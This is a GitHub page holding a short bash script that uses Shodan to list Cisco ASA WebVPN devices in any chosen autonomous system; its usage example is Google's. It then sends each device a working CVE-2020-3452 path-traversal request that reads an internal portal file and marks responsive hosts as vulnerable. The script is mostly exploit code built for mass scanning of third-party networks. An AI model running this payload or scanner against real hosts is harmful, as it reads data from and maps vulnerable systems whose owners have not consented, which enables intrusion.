-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathCVE-2020-3452-checker.sh
27 lines (23 loc) · 1.03 KB
/
CVE-2020-3452-checker.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
#!/bin/bash
# https://github.com/faisalfs10x
# 07-JAN-2020
echo
echo " Cisco ASA CVE-2020-3452 Shodan Scanner"
echo " Grep list of Cisco ASA Device IP from target ASN thru shodan-cli"
echo " Require Shodan-CLI : pip install -U --user shodan" #https://help.shodan.io/command-line-interface/0-installation
echo " Example Usage: bash CVE-2020-3452-checker.sh AS15169" #AS15169 is Google ASN
echo
target_ASN=$1
echo -e "\n\e[93m[+]Targets Found On Shodan: \e[0m"
count=$(shodan count "set-cookie: webvpn;" asn:$1 2>/dev/null)
echo $count
tar_IP=$(shodan search --fields 'ip_str,port' --separator , "set-cookie: webvpn;" asn:$1 2>/dev/null | sort -u | awk -F',' '{print $1":"$2}')
echo -e "\n\e[93m[+]Trying to verify the vulnerable targets: \e[0m"
for ip in $tar_IP;
do
if curl -s "https://$ip/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua" -k --connect-timeout 5 | grep -q "Copyright"; then
echo -e "\e[91m$ip vulnerable\e[0m"
else
echo -e "\e[92m$ip is good\e[0m"
fi
done